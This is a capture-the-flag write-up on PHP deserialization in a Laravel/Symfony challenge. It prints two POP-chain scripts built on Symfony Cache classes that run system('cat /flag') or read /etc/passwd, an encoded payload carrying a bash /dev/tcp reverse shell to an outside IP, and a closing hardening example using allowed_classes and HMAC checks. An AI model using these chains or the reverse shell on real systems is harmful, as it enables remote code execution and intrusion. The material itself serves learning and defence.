0x00 Key points

The core of this challenge is finding the POP chain. I looked at the write-ups online and, wow, this is tough...

Posting the approach and PoC first; I'll come back and redo it once I'm more fluent.

https://glotozz.github.io/2019/11/05/buuctf-wp-4/

POP chain:

<?php
namespace Symfony\Component\Cache;

class CacheItem
{
    protected $innerItem = 'cat /flag';
}

namespace Symfony\Component\Cache\Adapter;

class ProxyAdapter
{
    private $setInnerItem = 'system';
}

class TagAwareAdapter
{
    public $deferred = [];

    public function __construct()
    {
        $this->pool = new ProxyAdapter();
    }
}

$a = new TagAwareAdapter();
$a->deferred = array('a' => new \Symfony\Component\Cache\CacheItem);
echo urlencode(serialize($a));

Link 2:

https://xz.aliyun.com/t/5816#toc-3

<?php
namespace Symfony\Component\Cache {
    use Symfony\Component\Cache\Adapter\ProxyAdapter;

    final class CacheItem
    {
        protected $key;
        protected $value;
        protected $isHit = false;
        protected $expiry;
        protected $defaultLifetime;
        protected $metadata = [];
        protected $newMetadata = [];
        protected $innerItem;
        protected $poolHash;
        protected $isTaggable = false;

        public function __construct()
        {
            $this->expiry = 'sjdjfkas';
            $this->poolHash = '123';
            $this->key = '';
        }
    }
}

namespace Symfony\Component\Cache\Adapter {
    use Symfony\Component\Cache\CacheItem;
    use Symfony\Component\Ldap\Adapter\ExtLdap\Adapter;

    class PhpArrayAdapter
    {
        private $file;

        public function __construct()
        {
            $this->file = '/etc/passwd';
        }
    }

    // Declared but never instantiated by the script below, so the undefined
    // ChainAdapter referenced in its constructor is never actually loaded.
    class ProxyAdapter
    {
        private $namespace;
        private $namespaceLen;
        private $createCacheItem;
        private $setInnerItem;
        private $poolHash;
        private $pool;

        public function __construct()
        {
            $this->pool = new ChainAdapter();
            $this->createCacheItem = 'call_user_func';
            $this->namespace = 'phpinfo';
        }
    }

    class TagAwareAdapter
    {
        private $deferred = [];
        private $createCacheItem;
        private $setCacheItemTags;
        private $getTagsByKey;
        private $invalidateTags;
        private $tags;
        private $knownTagVersions = [];
        private $knownTagVersionsTtl;
        private $pool;

        public function __construct()
        {
            $this->deferred = array('flight' => new CacheItem());
            $this->pool = new PhpArrayAdapter();
        }
    }
}

namespace {
    use Symfony\Component\Cache\Adapter\TagAwareAdapter;

    $obj = new TagAwareAdapter();
    echo urlencode(serialize($obj));
}

Official payload:

http://localhost/pop_chain/laravel/public/index.php/index?payload=O%3A47%3A%22Symfony%5CComponent%5CCache%5CAdapter%5CTagAwareAdapter%22%3A2%3A%7Bs%3A57%3A%22%00Symfony%5CComponent%5CCache%5CAdapter%5CTagAwareAdapter%00deferred%22%3Ba%3A1%3A%7Bi%3A1%3BO%3A33%3A%22Symfony%5CComponent%5CCache%5CCacheItem%22%3A3%3A%7Bs%3A12%3A%22%00%2A%00innerItem%22%3Bs%3A45%3A%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F115.159.184.127%2F9998%200%3E%261%22%3Bs%3A11%3A%22%00%2A%00poolHash%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00%2A%00expiry%22%3Bs%3A1%3A%221%22%3B%7D%7Ds%3A53%3A%22%00Symfony%5CComponent%5CCache%5CAdapter%5CTagAwareAdapter%00pool%22%3BO%3A44%3A%22Symfony%5CComponent%5CCache%5CAdapter%5CProxyAdapter%22%3A2%3A%7Bs%3A58%3A%22%00Symfony%5CComponent%5CCache%5CAdapter%5CProxyAdapter%00setInnerItem%22%3Bs%3A6%3A%22system%22%3Bs%3A54%3A%22%00Symfony%5CComponent%5CCache%5CAdapter%5CProxyAdapter%00poolHash%22%3Bs%3A1%3A%221%22%3B%7D%7D";}s:6:"_flash";a:2:{s:3:"old";a:0:{}s:3:"new";a:0:{}}}

Summing up how to find the POP chain for this challenge:

1: There is a deserialization point, so the hard part is finding the POP chain. Start by searching the whole code base for __destruct().

2: Follow into the methods reached from __destruct() that operate on variables we control.

3: If one class does not work, switch to another, then search globally for classes whose controllable methods can be used.
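As an added example (my own code, not from the original write-up and not Symfony or Laravel code), here is the other side of the chains above and of the three steps just listed: the two controls at the unserialize() call that stop a gadget's __destruct()/__wakeup() from ever running on attacker-chosen classes. The class DeferredJob, the functions seal/openSealed, the key value and the serialized input are all constructed for this example; it needs PHP 8.

```php
<?php
declare(strict_types=1);

// Hypothetical class standing in for any gadget: the counter records whether
// __wakeup()/__destruct() ran for an object produced by unserialize().
final class DeferredJob
{
    public static int $magicCalls = 0;
    public string $name = '';

    public function __wakeup(): void
    {
        self::$magicCalls++;
    }

    public function __destruct()
    {
        self::$magicCalls++;
    }
}

// Constructed attacker-controlled input, the same shape as the ?payload=
// parameter in the write-up: the class name is chosen by the sender.
$untrusted = 'O:11:"DeferredJob":1:{s:4:"name";s:3:"pwn";}';

// 1) Unhardened: magic methods of the attacker-chosen class execute.
$obj = unserialize($untrusted);
unset($obj);                                   // discarding the object fires __destruct()
printf("unhardened: %d magic calls\n", DeferredJob::$magicCalls);

// 2) Hardened: allowed_classes => false restores every object in the payload
//    as __PHP_Incomplete_Class, which has no magic methods of its own, so the
//    gadget's __wakeup()/__destruct() never run.
DeferredJob::$magicCalls = 0;
$obj = unserialize($untrusted, ['allowed_classes' => false]);
$isIncomplete = $obj instanceof __PHP_Incomplete_Class;
unset($obj);
printf("hardened: incomplete=%s, %d magic calls\n",
    var_export($isIncomplete, true), DeferredJob::$magicCalls);

// 3) If objects really must cross the boundary, authenticate the blob first so
//    only server-produced data reaches unserialize(), and allowlist the classes.
function seal(string $blob, string $key): string
{
    return hash_hmac('sha256', $blob, $key) . '|' . base64_encode($blob);
}

function openSealed(string $token, string $key, array $allowed): mixed
{
    [$mac, $b64] = explode('|', $token, 2) + [null, null];
    $blob = base64_decode((string) $b64, true);
    // hash_equals() is constant-time; the MAC is checked before any parsing.
    if ($blob === false || !hash_equals(hash_hmac('sha256', $blob, $key), (string) $mac)) {
        throw new RuntimeException('payload rejected: bad MAC');
    }
    return unserialize($blob, ['allowed_classes' => $allowed]);
}

$key = 'hypothetical-server-secret';   // would come from server config, never from the request
$token = seal(serialize(['page' => 2]), $key);
var_dump(openSealed($token, $key, []));

try {
    // A forged token carrying the constructed payload never reaches unserialize().
    openSealed('deadbeef|' . base64_encode($untrusted), $key, []);
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
```

Run it with php and compare the two counters: the unhardened call reports two magic calls (__wakeup on restore, __destruct on release), the hardened one reports zero and an incomplete object. The MAC wrapper is what a framework's signed/encrypted session cookie gives you for free; the moment a raw query parameter is fed to unserialize(), as in this challenge, that protection is gone and only allowed_classes stands between the input and every __destruct() found in step 1.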
